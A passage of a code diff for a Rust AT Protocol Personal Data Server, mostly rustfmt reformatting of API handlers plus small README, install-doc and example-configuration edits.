+1
-1
.env.example
+1
-1
.env.example
···
53
53
# Appview URL for proxying app.bsky.* requests
54
54
# APPVIEW_URL=https://api.bsky.app
55
55
# Comma-separated list of relay URLs to notify via requestCrawl
56
-
# CRAWLERS=https://bsky.network
56
+
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
57
57
# =============================================================================
58
58
# Firehose (subscribeRepos WebSocket)
59
59
# =============================================================================
+25
-10
README.md
+25
-10
README.md
···
1
1
# BSPDS
2
-
A production-grade Personal Data Server (PDS) for the AT Protocol. Drop-in replacement for Bluesky's reference PDS, using postgres and s3-compatible blob storage.
2
+
3
+
A production-grade Personal Data Server (PDS) for the AT Protocol. Drop-in replacement for Bluesky's reference PDS, written in rust with postgres and s3-compatible blob storage.
4
+
3
5
## Features
6
+
4
7
- Full AT Protocol support (`com.atproto.*` endpoints)
5
8
- OAuth 2.1 provider (PKCE, DPoP, PAR)
6
9
- WebSocket firehose (`subscribeRepos`)
7
10
- Multi-channel notifications (email, discord, telegram, signal)
8
11
- Built-in web UI for account management
9
12
- Per-IP rate limiting
13
+
10
14
## Quick Start
15
+
11
16
```bash
12
17
cp .env.example .env
13
18
podman compose up -d
14
19
just run
15
20
```
21
+
16
22
## Configuration
23
+
17
24
See `.env.example` for all configuration options.
25
+
18
26
## Development
27
+
19
28
Run `just` to see available commands.
29
+
20
30
```bash
21
-
just test # run tests
22
-
just lint # clippy + fmt
31
+
just test
32
+
just lint
23
33
```
34
+
24
35
## Production Deployment
36
+
25
37
### Quick Deploy (Docker/Podman Compose)
38
+
39
+
Edit `.env.prod` with your values. Generate secrets with `openssl rand -base64 48`.
40
+
26
41
```bash
27
42
cp .env.prod.example .env.prod
28
-
# Edit .env.prod with your values (generate secrets with: openssl rand -base64 48)
29
43
podman-compose -f docker-compose.prod.yml up -d
30
44
```
31
-
### Full Installation Guides
45
+
46
+
### Installation Guides
47
+
32
48
| Guide | Best For |
33
49
|-------|----------|
34
-
| **Native Installation** | Maximum performance, full control |
35
50
| [Debian](docs/install-debian.md) | Debian 13+ with systemd |
36
51
| [Alpine](docs/install-alpine.md) | Alpine 3.23+ with OpenRC |
37
52
| [OpenBSD](docs/install-openbsd.md) | OpenBSD 7.8+ with rc.d |
38
-
| **Containerized** | Easier updates, isolation |
39
-
| [Containers](docs/install-containers.md) | Podman with quadlets (Debian) or OpenRC (Alpine) |
40
-
| **Orchestrated** | High availability, auto-scaling |
41
-
| [Kubernetes](docs/install-kubernetes.md) | Multi-node k8s cluster deployment |
53
+
| [Containers](docs/install-containers.md) | Podman with quadlets or OpenRC |
54
+
| [Kubernetes](docs/install-kubernetes.md) | You know what you're doing |
55
+
42
56
## License
57
+
43
58
TBD
+1
-1
docs/install-kubernetes.md
+1
-1
docs/install-kubernetes.md
···
7
7
- s3-compatible object storage (minio operator, or just use a managed service)
8
8
- the app itself (it's just a container with some env vars)
9
9
10
-
You'll need a wildcard TLS certificate for `*.your-pds-hostname.example.com` — user handles are served as subdomains.
10
+
You'll need a wildcard TLS certificate for `*.your-pds-hostname.example.com`. User handles are served as subdomains.
11
11
12
12
The container image expects:
13
13
- `DATABASE_URL` - postgres connection string
+5
-4
src/api/actor/preferences.rs
+5
-4
src/api/actor/preferences.rs
···
1
1
use crate::state::AppState;
2
2
use axum::{
3
+
Json,
3
4
extract::State,
4
5
http::StatusCode,
5
6
response::{IntoResponse, Response},
6
-
Json,
7
7
};
8
8
use serde::{Deserialize, Serialize};
9
-
use serde_json::{json, Value};
9
+
use serde_json::{Value, json};
10
10
11
11
const APP_BSKY_NAMESPACE: &str = "app.bsky";
12
12
const MAX_PREFERENCES_COUNT: usize = 100;
···
75
75
let preferences: Vec<Value> = prefs
76
76
.into_iter()
77
77
.filter(|row| {
78
-
row.name == APP_BSKY_NAMESPACE || row.name.starts_with(&format!("{}.", APP_BSKY_NAMESPACE))
78
+
row.name == APP_BSKY_NAMESPACE
79
+
|| row.name.starts_with(&format!("{}.", APP_BSKY_NAMESPACE))
79
80
})
80
81
.filter_map(|row| {
81
82
if row.name == "app.bsky.actor.defs#declaredAgePref" {
···
221
222
.into_response();
222
223
}
223
224
}
224
-
if let Err(_) = tx.commit().await {
225
+
if tx.commit().await.is_err() {
225
226
return (
226
227
StatusCode::INTERNAL_SERVER_ERROR,
227
228
Json(json!({"error": "InternalError", "message": "Failed to commit transaction"})),
+71
-24
src/api/actor/profile.rs
+71
-24
src/api/actor/profile.rs
···
1
+
use crate::api::proxy_client::proxy_client;
1
2
use crate::state::AppState;
2
3
use axum::{
4
+
Json,
3
5
extract::{Query, State},
4
6
http::StatusCode,
5
7
response::{IntoResponse, Response},
6
-
Json,
7
8
};
8
9
use jacquard_repo::storage::BlockStore;
9
-
use crate::api::proxy_client::proxy_client;
10
10
use serde::{Deserialize, Serialize};
11
-
use serde_json::{json, Value};
11
+
use serde_json::{Value, json};
12
12
use std::collections::HashMap;
13
13
use tracing::{error, info};
14
14
···
79
79
let appview_url = match std::env::var("APPVIEW_URL") {
80
80
Ok(url) => url,
81
81
Err(_) => {
82
-
return Err(
83
-
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "No upstream AppView configured"}))).into_response()
84
-
);
82
+
return Err((
83
+
StatusCode::BAD_GATEWAY,
84
+
Json(
85
+
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
86
+
),
87
+
)
88
+
.into_response());
85
89
}
86
90
};
87
91
let target_url = format!("{}/xrpc/{}", appview_url, method);
···
89
93
let client = proxy_client();
90
94
let mut request_builder = client.get(&target_url).query(params);
91
95
if let Some(key_bytes) = auth_key_bytes {
92
-
let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
96
+
let appview_did =
97
+
std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
93
98
match crate::auth::create_service_token(auth_did, &appview_did, method, key_bytes) {
94
99
Ok(service_token) => {
95
-
request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token));
100
+
request_builder =
101
+
request_builder.header("Authorization", format!("Bearer {}", service_token));
96
102
}
97
103
Err(e) => {
98
104
error!("Failed to create service token: {:?}", e);
99
-
return Err((StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response());
105
+
return Err((
106
+
StatusCode::INTERNAL_SERVER_ERROR,
107
+
Json(json!({"error": "InternalError"})),
108
+
)
109
+
.into_response());
100
110
}
101
111
}
102
112
}
103
113
match request_builder.send().await {
104
114
Ok(resp) => {
105
-
let status = StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
115
+
let status =
116
+
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
106
117
match resp.json::<Value>().await {
107
118
Ok(body) => Ok((status, body)),
108
119
Err(e) => {
109
120
error!("Error parsing proxy response: {:?}", e);
110
-
Err((StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response())
121
+
Err((
122
+
StatusCode::BAD_GATEWAY,
123
+
Json(json!({"error": "UpstreamError"})),
124
+
)
125
+
.into_response())
111
126
}
112
127
}
113
128
}
114
129
Err(e) => {
115
130
error!("Error sending proxy request: {:?}", e);
116
131
if e.is_timeout() {
117
-
Err((StatusCode::GATEWAY_TIMEOUT, Json(json!({"error": "UpstreamTimeout"}))).into_response())
132
+
Err((
133
+
StatusCode::GATEWAY_TIMEOUT,
134
+
Json(json!({"error": "UpstreamTimeout"})),
135
+
)
136
+
.into_response())
118
137
} else {
119
-
Err((StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response())
138
+
Err((
139
+
StatusCode::BAD_GATEWAY,
140
+
Json(json!({"error": "UpstreamError"})),
141
+
)
142
+
.into_response())
120
143
}
121
144
}
122
145
}
···
130
153
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
131
154
let auth_user = if let Some(h) = auth_header {
132
155
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
133
-
crate::auth::validate_bearer_token(&state.db, &token).await.ok()
156
+
crate::auth::validate_bearer_token(&state.db, &token)
157
+
.await
158
+
.ok()
134
159
} else {
135
160
None
136
161
}
···
141
166
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
142
167
let mut query_params = HashMap::new();
143
168
query_params.insert("actor".to_string(), params.actor.clone());
144
-
let (status, body) = match proxy_to_appview("app.bsky.actor.getProfile", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await {
169
+
let (status, body) = match proxy_to_appview(
170
+
"app.bsky.actor.getProfile",
171
+
&query_params,
172
+
auth_did.as_deref().unwrap_or(""),
173
+
auth_key_bytes.as_deref(),
174
+
)
175
+
.await
176
+
{
145
177
Ok(r) => r,
146
178
Err(e) => return e,
147
179
};
···
151
183
let mut profile: ProfileViewDetailed = match serde_json::from_value(body) {
152
184
Ok(p) => p,
153
185
Err(_) => {
154
-
return (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "Invalid profile response"}))).into_response();
186
+
return (
187
+
StatusCode::BAD_GATEWAY,
188
+
Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})),
189
+
)
190
+
.into_response();
155
191
}
156
192
};
157
-
if let Some(ref did) = auth_did {
158
-
if profile.did == *did {
159
-
if let Some(local_record) = get_local_profile_record(&state, did).await {
193
+
if let Some(ref did) = auth_did
194
+
&& profile.did == *did
195
+
&& let Some(local_record) = get_local_profile_record(&state, did).await {
160
196
munge_profile_with_local(&mut profile, &local_record);
161
197
}
162
-
}
163
-
}
164
198
(StatusCode::OK, Json(profile)).into_response()
165
199
}
166
200
···
172
206
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
173
207
let auth_user = if let Some(h) = auth_header {
174
208
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
175
-
crate::auth::validate_bearer_token(&state.db, &token).await.ok()
209
+
crate::auth::validate_bearer_token(&state.db, &token)
210
+
.await
211
+
.ok()
176
212
} else {
177
213
None
178
214
}
···
183
219
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
184
220
let mut query_params = HashMap::new();
185
221
query_params.insert("actors".to_string(), params.actors.clone());
186
-
let (status, body) = match proxy_to_appview("app.bsky.actor.getProfiles", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await {
222
+
let (status, body) = match proxy_to_appview(
223
+
"app.bsky.actor.getProfiles",
224
+
&query_params,
225
+
auth_did.as_deref().unwrap_or(""),
226
+
auth_key_bytes.as_deref(),
227
+
)
228
+
.await
229
+
{
187
230
Ok(r) => r,
188
231
Err(e) => return e,
189
232
};
···
193
236
let mut output: GetProfilesOutput = match serde_json::from_value(body) {
194
237
Ok(p) => p,
195
238
Err(_) => {
196
-
return (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"}))).into_response();
239
+
return (
240
+
StatusCode::BAD_GATEWAY,
241
+
Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})),
242
+
)
243
+
.into_response();
197
244
}
198
245
};
199
246
if let Some(ref did) = auth_did {
+31
-11
src/api/admin/account/delete.rs
+31
-11
src/api/admin/account/delete.rs
···
121
121
.execute(&mut *tx)
122
122
.await
123
123
{
124
-
error!("Failed to delete app passwords for user {}: {:?}", user_id, e);
124
+
error!(
125
+
"Failed to delete app passwords for user {}: {:?}",
126
+
user_id, e
127
+
);
125
128
return (
126
129
StatusCode::INTERNAL_SERVER_ERROR,
127
130
Json(json!({"error": "InternalError", "message": "Failed to delete app passwords"})),
128
131
)
129
132
.into_response();
130
133
}
131
-
if let Err(e) = sqlx::query!("DELETE FROM invite_code_uses WHERE used_by_user = $1", user_id)
132
-
.execute(&mut *tx)
133
-
.await
134
+
if let Err(e) = sqlx::query!(
135
+
"DELETE FROM invite_code_uses WHERE used_by_user = $1",
136
+
user_id
137
+
)
138
+
.execute(&mut *tx)
139
+
.await
134
140
{
135
-
error!("Failed to delete invite code uses for user {}: {:?}", user_id, e);
141
+
error!(
142
+
"Failed to delete invite code uses for user {}: {:?}",
143
+
user_id, e
144
+
);
136
145
}
137
-
if let Err(e) = sqlx::query!("DELETE FROM invite_codes WHERE created_by_user = $1", user_id)
138
-
.execute(&mut *tx)
139
-
.await
146
+
if let Err(e) = sqlx::query!(
147
+
"DELETE FROM invite_codes WHERE created_by_user = $1",
148
+
user_id
149
+
)
150
+
.execute(&mut *tx)
151
+
.await
140
152
{
141
-
error!("Failed to delete invite codes for user {}: {:?}", user_id, e);
153
+
error!(
154
+
"Failed to delete invite codes for user {}: {:?}",
155
+
user_id, e
156
+
);
142
157
}
143
158
if let Err(e) = sqlx::query!("DELETE FROM user_keys WHERE user_id = $1", user_id)
144
159
.execute(&mut *tx)
···
170
185
)
171
186
.into_response();
172
187
}
173
-
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, false, Some("deleted")).await {
174
-
warn!("Failed to sequence account deletion event for {}: {}", did, e);
188
+
if let Err(e) =
189
+
crate::api::repo::record::sequence_account_event(&state, did, false, Some("deleted")).await
190
+
{
191
+
warn!(
192
+
"Failed to sequence account deletion event for {}: {}",
193
+
did, e
194
+
);
175
195
}
176
196
let _ = state.cache.delete(&format!("handle:{}", handle)).await;
177
197
(StatusCode::OK, Json(json!({}))).into_response()
+1
-5
src/api/admin/account/email.rs
+1
-5
src/api/admin/account/email.rs
···
104
104
let result = crate::notifications::enqueue_notification(&state.db, notification).await;
105
105
match result {
106
106
Ok(_) => {
107
-
tracing::info!(
108
-
"Admin email queued for {} ({})",
109
-
handle,
110
-
recipient_did
111
-
);
107
+
tracing::info!("Admin email queued for {} ({})", handle, recipient_did);
112
108
(StatusCode::OK, Json(SendEmailOutput { sent: true })).into_response()
113
109
}
114
110
Err(e) => {
+14
-16
src/api/admin/account/info.rs
+14
-16
src/api/admin/account/info.rs
···
65
65
.fetch_optional(&state.db)
66
66
.await;
67
67
match result {
68
-
Ok(Some(row)) => {
69
-
(
70
-
StatusCode::OK,
71
-
Json(AccountInfo {
72
-
did: row.did,
73
-
handle: row.handle,
74
-
email: row.email,
75
-
indexed_at: row.created_at.to_rfc3339(),
76
-
invite_note: None,
77
-
invites_disabled: false,
78
-
email_confirmed_at: None,
79
-
deactivated_at: None,
80
-
}),
81
-
)
82
-
.into_response()
83
-
}
68
+
Ok(Some(row)) => (
69
+
StatusCode::OK,
70
+
Json(AccountInfo {
71
+
did: row.did,
72
+
handle: row.handle,
73
+
email: row.email,
74
+
indexed_at: row.created_at.to_rfc3339(),
75
+
invite_note: None,
76
+
invites_disabled: false,
77
+
email_confirmed_at: None,
78
+
deactivated_at: None,
79
+
}),
80
+
)
81
+
.into_response(),
84
82
Ok(None) => (
85
83
StatusCode::NOT_FOUND,
86
84
Json(json!({"error": "AccountNotFound", "message": "Account not found"})),
+10
-7
src/api/admin/account/mod.rs
+10
-7
src/api/admin/account/mod.rs
···
4
4
mod profile;
5
5
mod update;
6
6
7
-
pub use delete::{delete_account, DeleteAccountInput};
8
-
pub use email::{send_email, SendEmailInput, SendEmailOutput};
7
+
pub use delete::{DeleteAccountInput, delete_account};
8
+
pub use email::{SendEmailInput, SendEmailOutput, send_email};
9
9
pub use info::{
10
-
get_account_info, get_account_infos, AccountInfo, GetAccountInfoParams, GetAccountInfosOutput,
11
-
GetAccountInfosParams,
10
+
AccountInfo, GetAccountInfoParams, GetAccountInfosOutput, GetAccountInfosParams,
11
+
get_account_info, get_account_infos,
12
+
};
13
+
pub use profile::{
14
+
CreateProfileInput, CreateProfileOutput, CreateRecordAdminInput, create_profile,
15
+
create_record_admin,
12
16
};
13
-
pub use profile::{create_profile, create_record_admin, CreateProfileInput, CreateProfileOutput, CreateRecordAdminInput};
14
17
pub use update::{
15
-
update_account_email, update_account_handle, update_account_password, UpdateAccountEmailInput,
16
-
UpdateAccountHandleInput, UpdateAccountPasswordInput,
18
+
UpdateAccountEmailInput, UpdateAccountHandleInput, UpdateAccountPasswordInput,
19
+
update_account_email, update_account_handle, update_account_password,
17
20
};
+7
-11
src/api/admin/account/profile.rs
+7
-11
src/api/admin/account/profile.rs
···
74
74
"app.bsky.actor.profile",
75
75
"self",
76
76
&profile_record,
77
-
).await {
77
+
)
78
+
.await
79
+
{
78
80
Ok((uri, commit_cid)) => {
79
81
info!(did = %did, uri = %uri, "Created profile for user");
80
82
(
···
120
122
.into_response();
121
123
}
122
124
123
-
let rkey = input.rkey.unwrap_or_else(|| {
124
-
chrono::Utc::now().format("%Y%m%d%H%M%S%f").to_string()
125
-
});
125
+
let rkey = input
126
+
.rkey
127
+
.unwrap_or_else(|| chrono::Utc::now().format("%Y%m%d%H%M%S%f").to_string());
126
128
127
-
match create_record_internal(
128
-
&state,
129
-
did,
130
-
&input.collection,
131
-
&rkey,
132
-
&input.record,
133
-
).await {
129
+
match create_record_internal(&state, did, &input.collection, &rkey, &input.record).await {
134
130
Ok((uri, commit_cid)) => {
135
131
info!(did = %did, uri = %uri, "Admin created record");
136
132
(
+17
-7
src/api/admin/account/update.rs
+17
-7
src/api/admin/account/update.rs
···
96
96
{
97
97
return (
98
98
StatusCode::BAD_REQUEST,
99
-
Json(json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"})),
99
+
Json(
100
+
json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"}),
101
+
),
100
102
)
101
103
.into_response();
102
104
}
···
105
107
.await
106
108
.ok()
107
109
.flatten();
108
-
let existing = sqlx::query!("SELECT id FROM users WHERE handle = $1 AND did != $2", handle, did)
109
-
.fetch_optional(&state.db)
110
-
.await;
110
+
let existing = sqlx::query!(
111
+
"SELECT id FROM users WHERE handle = $1 AND did != $2",
112
+
handle,
113
+
did
114
+
)
115
+
.fetch_optional(&state.db)
116
+
.await;
111
117
if let Ok(Some(_)) = existing {
112
118
return (
113
119
StatusCode::BAD_REQUEST,
···
183
189
.into_response();
184
190
}
185
191
};
186
-
let result = sqlx::query!("UPDATE users SET password_hash = $1 WHERE did = $2", password_hash, did)
187
-
.execute(&state.db)
188
-
.await;
192
+
let result = sqlx::query!(
193
+
"UPDATE users SET password_hash = $1 WHERE did = $2",
194
+
password_hash,
195
+
did
196
+
)
197
+
.execute(&state.db)
198
+
.await;
189
199
match result {
190
200
Ok(r) => {
191
201
if r.rows_affected() == 0 {
+45
-17
src/api/admin/invite.rs
+45
-17
src/api/admin/invite.rs
···
31
31
}
32
32
if let Some(codes) = &input.codes {
33
33
for code in codes {
34
-
let _ = sqlx::query!("UPDATE invite_codes SET disabled = TRUE WHERE code = $1", code)
35
-
.execute(&state.db)
36
-
.await;
34
+
let _ = sqlx::query!(
35
+
"UPDATE invite_codes SET disabled = TRUE WHERE code = $1",
36
+
code
37
+
)
38
+
.execute(&state.db)
39
+
.await;
37
40
}
38
41
}
39
42
if let Some(accounts) = &input.accounts {
···
106
109
_ => "created_at DESC",
107
110
};
108
111
let codes_result = if let Some(cursor) = ¶ms.cursor {
109
-
sqlx::query_as::<_, (String, i32, Option<bool>, uuid::Uuid, chrono::DateTime<chrono::Utc>)>(&format!(
112
+
sqlx::query_as::<
113
+
_,
114
+
(
115
+
String,
116
+
i32,
117
+
Option<bool>,
118
+
uuid::Uuid,
119
+
chrono::DateTime<chrono::Utc>,
120
+
),
121
+
>(&format!(
110
122
r#"
111
123
SELECT ic.code, ic.available_uses, ic.disabled, ic.created_by_user, ic.created_at
112
124
FROM invite_codes ic
···
121
133
.fetch_all(&state.db)
122
134
.await
123
135
} else {
124
-
sqlx::query_as::<_, (String, i32, Option<bool>, uuid::Uuid, chrono::DateTime<chrono::Utc>)>(&format!(
136
+
sqlx::query_as::<
137
+
_,
138
+
(
139
+
String,
140
+
i32,
141
+
Option<bool>,
142
+
uuid::Uuid,
143
+
chrono::DateTime<chrono::Utc>,
144
+
),
145
+
>(&format!(
125
146
r#"
126
147
SELECT ic.code, ic.available_uses, ic.disabled, ic.created_by_user, ic.created_at
127
148
FROM invite_codes ic
···
147
168
};
148
169
let mut codes = Vec::new();
149
170
for (code, available_uses, disabled, created_by_user, created_at) in &codes_rows {
150
-
let creator_did = sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", created_by_user)
151
-
.fetch_optional(&state.db)
152
-
.await
153
-
.ok()
154
-
.flatten()
155
-
.unwrap_or_else(|| "unknown".to_string());
171
+
let creator_did =
172
+
sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", created_by_user)
173
+
.fetch_optional(&state.db)
174
+
.await
175
+
.ok()
176
+
.flatten()
177
+
.unwrap_or_else(|| "unknown".to_string());
156
178
let uses_result = sqlx::query!(
157
179
r#"
158
180
SELECT u.did, icu.used_at
···
226
248
)
227
249
.into_response();
228
250
}
229
-
let result = sqlx::query!("UPDATE users SET invites_disabled = TRUE WHERE did = $1", account)
230
-
.execute(&state.db)
231
-
.await;
251
+
let result = sqlx::query!(
252
+
"UPDATE users SET invites_disabled = TRUE WHERE did = $1",
253
+
account
254
+
)
255
+
.execute(&state.db)
256
+
.await;
232
257
match result {
233
258
Ok(r) => {
234
259
if r.rows_affected() == 0 {
···
277
302
)
278
303
.into_response();
279
304
}
280
-
let result = sqlx::query!("UPDATE users SET invites_disabled = FALSE WHERE did = $1", account)
281
-
.execute(&state.db)
282
-
.await;
305
+
let result = sqlx::query!(
306
+
"UPDATE users SET invites_disabled = FALSE WHERE did = $1",
307
+
account
308
+
)
309
+
.execute(&state.db)
310
+
.await;
283
311
match result {
284
312
Ok(r) => {
285
313
if r.rows_affected() == 0 {
+47
-18
src/api/admin/status.rs
+47
-18
src/api/admin/status.rs
···
142
142
}
143
143
}
144
144
if let Some(blob_cid) = ¶ms.blob {
145
-
let blob = sqlx::query!("SELECT cid, takedown_ref FROM blobs WHERE cid = $1", blob_cid)
146
-
.fetch_optional(&state.db)
147
-
.await;
145
+
let blob = sqlx::query!(
146
+
"SELECT cid, takedown_ref FROM blobs WHERE cid = $1",
147
+
blob_cid
148
+
)
149
+
.fetch_optional(&state.db)
150
+
.await;
148
151
match blob {
149
152
Ok(Some(row)) => {
150
153
let takedown = row.takedown_ref.as_ref().map(|r| StatusAttr {
···
263
266
.execute(&mut *tx)
264
267
.await
265
268
} else {
266
-
sqlx::query!(
267
-
"UPDATE users SET deactivated_at = NULL WHERE did = $1",
268
-
did
269
-
)
270
-
.execute(&mut *tx)
271
-
.await
269
+
sqlx::query!("UPDATE users SET deactivated_at = NULL WHERE did = $1", did)
270
+
.execute(&mut *tx)
271
+
.await
272
272
};
273
273
if let Err(e) = result {
274
-
error!("Failed to update user deactivation status for {}: {:?}", did, e);
274
+
error!(
275
+
"Failed to update user deactivation status for {}: {:?}",
276
+
did, e
277
+
);
275
278
return (
276
279
StatusCode::INTERNAL_SERVER_ERROR,
277
280
Json(json!({"error": "InternalError", "message": "Failed to update deactivation status"})),
···
288
291
.into_response();
289
292
}
290
293
if let Some(takedown) = &input.takedown {
291
-
let status = if takedown.apply { Some("takendown") } else { None };
292
-
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, !takedown.apply, status).await {
294
+
let status = if takedown.apply {
295
+
Some("takendown")
296
+
} else {
297
+
None
298
+
};
299
+
if let Err(e) = crate::api::repo::record::sequence_account_event(
300
+
&state,
301
+
did,
302
+
!takedown.apply,
303
+
status,
304
+
)
305
+
.await
306
+
{
293
307
warn!("Failed to sequence account event for takedown: {}", e);
294
308
}
295
309
}
296
310
if let Some(deactivated) = &input.deactivated {
297
-
let status = if deactivated.apply { Some("deactivated") } else { None };
298
-
if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, !deactivated.apply, status).await {
311
+
let status = if deactivated.apply {
312
+
Some("deactivated")
313
+
} else {
314
+
None
315
+
};
316
+
if let Err(e) = crate::api::repo::record::sequence_account_event(
317
+
&state,
318
+
did,
319
+
!deactivated.apply,
320
+
status,
321
+
)
322
+
.await
323
+
{
299
324
warn!("Failed to sequence account event for deactivation: {}", e);
300
325
}
301
326
}
302
-
if let Ok(Some(handle)) = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
303
-
.fetch_optional(&state.db)
304
-
.await
327
+
if let Ok(Some(handle)) =
328
+
sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did)
329
+
.fetch_optional(&state.db)
330
+
.await
305
331
{
306
332
let _ = state.cache.delete(&format!("handle:{}", handle)).await;
307
333
}
···
338
364
.execute(&state.db)
339
365
.await
340
366
{
341
-
error!("Failed to update record takedown status for {}: {:?}", uri, e);
367
+
error!(
368
+
"Failed to update record takedown status for {}: {:?}",
369
+
uri, e
370
+
);
342
371
return (
343
372
StatusCode::INTERNAL_SERVER_ERROR,
344
373
Json(json!({"error": "InternalError", "message": "Failed to update takedown status"})),
+24
-9
src/api/error.rs
+24
-9
src/api/error.rs
···
46
46
UpstreamFailure,
47
47
UpstreamTimeout,
48
48
UpstreamUnavailable(String),
49
-
UpstreamError { status: u16, error: Option<String>, message: Option<String> },
49
+
UpstreamError {
50
+
status: u16,
51
+
error: Option<String>,
52
+
message: Option<String>,
53
+
},
50
54
}
51
55
52
56
impl ApiError {
···
135
139
_ => None,
136
140
}
137
141
}
138
-
pub fn from_upstream_response(
139
-
status: u16,
140
-
body: &[u8],
141
-
) -> Self {
142
+
pub fn from_upstream_response(status: u16, body: &[u8]) -> Self {
142
143
if let Ok(parsed) = serde_json::from_slice::<serde_json::Value>(body) {
143
-
let error = parsed.get("error").and_then(|v| v.as_str()).map(String::from);
144
-
let message = parsed.get("message").and_then(|v| v.as_str()).map(String::from);
145
-
return Self::UpstreamError { status, error, message };
144
+
let error = parsed
145
+
.get("error")
146
+
.and_then(|v| v.as_str())
147
+
.map(String::from);
148
+
let message = parsed
149
+
.get("message")
150
+
.and_then(|v| v.as_str())
151
+
.map(String::from);
152
+
return Self::UpstreamError {
153
+
status,
154
+
error,
155
+
message,
156
+
};
157
+
}
158
+
Self::UpstreamError {
159
+
status,
160
+
error: None,
161
+
message: None,
146
162
}
147
-
Self::UpstreamError { status, error: None, message: None }
148
163
}
149
164
}
150
165
+17
-9
src/api/feed/actor_likes.rs
+17
-9
src/api/feed/actor_likes.rs
···
1
1
use crate::api::read_after_write::{
2
-
extract_repo_rev, format_munged_response, get_local_lag, get_records_since_rev,
3
-
proxy_to_appview, FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript,
2
+
FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev,
3
+
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview,
4
4
};
5
5
use crate::state::AppState;
6
6
use axum::{
7
+
Json,
7
8
extract::{Query, State},
8
9
http::StatusCode,
9
10
response::{IntoResponse, Response},
10
-
Json,
11
11
};
12
12
use serde::Deserialize;
13
13
use serde_json::Value;
···
68
68
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
69
69
let auth_user = if let Some(h) = auth_header {
70
70
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
71
-
crate::auth::validate_bearer_token(&state.db, &token).await.ok()
71
+
crate::auth::validate_bearer_token(&state.db, &token)
72
+
.await
73
+
.ok()
72
74
} else {
73
75
None
74
76
}
···
85
87
if let Some(cursor) = ¶ms.cursor {
86
88
query_params.insert("cursor".to_string(), cursor.clone());
87
89
}
88
-
let proxy_result =
89
-
match proxy_to_appview("app.bsky.feed.getActorLikes", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await {
90
-
Ok(r) => r,
91
-
Err(e) => return e,
92
-
};
90
+
let proxy_result = match proxy_to_appview(
91
+
"app.bsky.feed.getActorLikes",
92
+
&query_params,
93
+
auth_did.as_deref().unwrap_or(""),
94
+
auth_key_bytes.as_deref(),
95
+
)
96
+
.await
97
+
{
98
+
Ok(r) => r,
99
+
Err(e) => return e,
100
+
};
93
101
if !proxy_result.status.is_success() {
94
102
return proxy_result.into_response();
95
103
}
+12
-5
src/api/feed/custom_feed.rs
+12
-5
src/api/feed/custom_feed.rs
···
1
+
use crate::api::ApiError;
1
2
use crate::api::proxy_client::{
2
-
is_ssrf_safe, proxy_client, validate_at_uri, validate_limit, MAX_RESPONSE_SIZE,
3
+
MAX_RESPONSE_SIZE, is_ssrf_safe, proxy_client, validate_at_uri, validate_limit,
3
4
};
4
-
use crate::api::ApiError;
5
5
use crate::state::AppState;
6
6
use axum::{
7
7
extract::{Query, State},
···
61
61
let client = proxy_client();
62
62
let mut request_builder = client.get(&target_url).query(&query_params);
63
63
if let Some(key_bytes) = auth_user.key_bytes.as_ref() {
64
-
let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
65
-
match crate::auth::create_service_token(&auth_user.did, &appview_did, "app.bsky.feed.getFeed", key_bytes) {
64
+
let appview_did =
65
+
std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
66
+
match crate::auth::create_service_token(
67
+
&auth_user.did,
68
+
&appview_did,
69
+
"app.bsky.feed.getFeed",
70
+
key_bytes,
71
+
) {
66
72
Ok(service_token) => {
67
-
request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token));
73
+
request_builder =
74
+
request_builder.header("Authorization", format!("Bearer {}", service_token));
68
75
}
69
76
Err(e) => {
70
77
error!(error = ?e, "Failed to create service token for getFeed");
+41
-21
src/api/feed/post_thread.rs
+41
-21
src/api/feed/post_thread.rs
···
1
1
use crate::api::read_after_write::{
2
-
extract_repo_rev, format_local_post, format_munged_response, get_local_lag,
3
-
get_records_since_rev, proxy_to_appview, PostRecord, PostView, RecordDescript,
2
+
PostRecord, PostView, RecordDescript, extract_repo_rev, format_local_post,
